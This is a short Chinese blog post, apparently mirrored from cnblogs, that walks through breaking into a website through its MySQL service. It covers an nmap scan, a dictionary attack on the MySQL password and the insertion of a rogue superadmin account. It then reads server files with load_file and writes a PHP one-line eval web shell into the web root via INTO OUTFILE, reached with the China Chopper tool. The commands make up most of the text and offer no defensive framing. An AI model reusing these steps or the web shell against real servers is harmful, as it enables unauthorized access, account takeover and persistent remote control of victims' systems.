zoukankan      html  css  js  c++  java
  • mysql渗透过程

    1 打开目标站点:www.xxx.com

    2 注册账号并登录,大概找下注入点,没找到

    3 用namp -A -T4 目标站点扫描开放的服务

       发现mysql等

    4 猜弱口令 + 字典  对mysql进行了破译  (运气较好,得到了密码)

    5 连接到mysql   找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符

       于是复制了一个超级管理员,用户名及密码复制之前注册的账号

    6  打开网站首页,登录,进入管理界面。没找到上传漏洞,也没发现物理路径。

    7  在mysql 中尝试读取文件

        select load_file('c:/windows/php.ini');  结果为null

      于是创建新表

    create table datainfo (aaa text);

      尝试读取文件到表中

           load data infile 'php.ini' into table datainfo; 提示D:phpStudy4IISMySQLdatafactoryphp.ini not found

      可以看出是用phpStudy4IIS创建的,于是下载一个phpStudy4IIS研究目录

          select load_file('D:/phpStudy4IIS/tools/phpStudy.ini');  发现网站根目录等

         写入一句话

         select '<?php @eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy4IIS/WWW/include/xx.php';

         用菜刀连接:www.xxx.com/include/xx.php   cmd

  • 相关阅读:
    Redis——发布/订阅
    Redis——任务队列
    GOF设计模式——Builder模式
    GOF设计模式——Prototype模式
    GOF设计模式——Singleton模式
    shell 脚本中的数学计算表达
    shell $'somestring'
    shell if-elif-elif-fi
    vim 使用
    疑问:为什么要使用href=”javascript:void(0);”?
  • 原文地址:https://www.cnblogs.com/yzloo/p/10390888.html
Copyright © 2011-2022 走看看